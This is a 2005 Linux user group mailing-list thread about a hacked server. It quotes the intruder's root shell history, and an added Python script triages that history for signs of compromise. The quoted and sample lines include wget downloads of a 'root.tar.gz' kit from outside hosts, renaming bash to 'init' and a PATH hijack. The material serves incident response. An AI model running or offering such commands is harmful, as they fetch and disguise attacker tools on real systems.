[wellylug] Think I've had a server hacked
Cliff Pratt
enkidu at cliffp.com
Thu Oct 27 09:16:16 NZDT 2005
Good luck. It's Wanadoo, one of the biggest sources of SPAM
on my lists.
Cheers,
Cliff
Jamie Baddeley wrote:
> at the very least you should try this:
>
> % Information related to '82.123.175.0 - 82.123.175.255'
>
> inetnum: 82.123.175.0 - 82.123.175.255
> netname: IP2000-ADSL-BAS
> descr: BSTUI152 Tuileries Bloc2
> country: FR
> admin-c: WITR1-RIPE
> tech-c: WITR1-RIPE
> status: ASSIGNED PA
> remarks: for hacking, spamming or security problems send mail to
> remarks: postmaster at wanadoo.fr AND abuse at wanadoo.fr
> mnt-by: FT-BRX
> source: RIPE # Filtered
>
>
> send them mail. Yes, 82.123.175.245 may simply be a compromised jump
> point, but it costs nothing to let them know.
>
> jamie
>
>
>
> On Wed, 2005-10-26 at 10:25 +1300, Mark Signal wrote:
>
>>Hi
>>
>>I set up a box ages ago for a client - redhat 7.2/Mitel with only ssh port
>>open
>>
>>root password just got changed and /var/log/auth deleted
>>last login from 82.123.175.245 (somewhere in Europe - normally only
>>connections from Lower Hutt :)
>>root bash history has..
>>w
>>passwd
>>uname -a
>>ps x
>>w
>>cd /var/tmp
>>ls
>>wget hash.idilis.ro/root.tar.gz
>>wget 217.156.85.3/root.tar.gz
>>fr hash.idilis.ro
>>ftp hash.idilis.ro
>>ftp 217.156.85.3
>>tar xzvf mech*
>>cd mech
>>mv bash init
>>PATH=:.PATH
>>init
>>init
>>init
>>
>>I am copying all the data off (including /var/logs/) and will
>>reinstall/update and shift ssh port
>>
>>is there anything else I can/should do?
>>
>>cheers
>>
>>
>>Mark
>
>
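
Added example (not part of the original thread): a Python triage pass over a root shell history like the one Mark quotes, flagging the password change, the downloads into a temp directory, the binary renamed to a system process name, and the current directory placed first in PATH. The rule names, the SYSTEM_NAMES watch list and the triage() helper are assumptions made for illustration.

```python
TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")   # world-writable staging spots
SYSTEM_NAMES = {"init", "sshd", "crond", "syslogd", "httpd"}  # assumed watch list
FETCHERS = {"wget", "curl", "ftp", "tftp", "scp"}

# Root history as quoted in the post above.
SAMPLE = """w
passwd
uname -a
ps x
w
cd /var/tmp
ls
wget hash.idilis.ro/root.tar.gz
wget 217.156.85.3/root.tar.gz
fr hash.idilis.ro
ftp hash.idilis.ro
ftp 217.156.85.3
tar xzvf mech*
cd mech
mv bash init
PATH=:.PATH
init
init
init""".splitlines()

def triage(history):
    """Return (line_no, rule, command) findings for one shell history."""
    findings, cwd, fake, hijacked = [], "", set(), False
    for no, raw in enumerate(history, 1):
        argv = raw.split()
        if not argv:
            continue
        cmd = argv[0]
        if cmd == "cd" and len(argv) > 1:
            # Follow cd so later commands are judged by where they ran.
            cwd = argv[1] if argv[1].startswith("/") else cwd.rstrip("/") + "/" + argv[1]
        elif cmd == "passwd":
            findings.append((no, "password-change", raw))
        elif cmd in FETCHERS and len(argv) > 1 and cwd.startswith(TEMP_DIRS):
            findings.append((no, "fetch-into-temp-dir", raw))
        elif cmd == "mv" and argv[-1].rsplit("/", 1)[-1] in SYSTEM_NAMES:
            fake.add(argv[-1].rsplit("/", 1)[-1])
            findings.append((no, "renamed-to-system-name", raw))
        elif raw.startswith(("PATH=", "export PATH=")) and raw.split("=", 1)[1].split(":")[0] in ("", "."):
            hijacked = True  # empty or "." first entry means cwd is searched first
            findings.append((no, "cwd-first-in-PATH", raw))
        elif hijacked and cmd in fake:
            findings.append((no, "masqueraded-binary-run", raw))
    return findings
```

Shell history is writable by whoever held the account (the auth log here was deleted), so treat the findings as leads to confirm against an offline copy of the disk, not as a complete record.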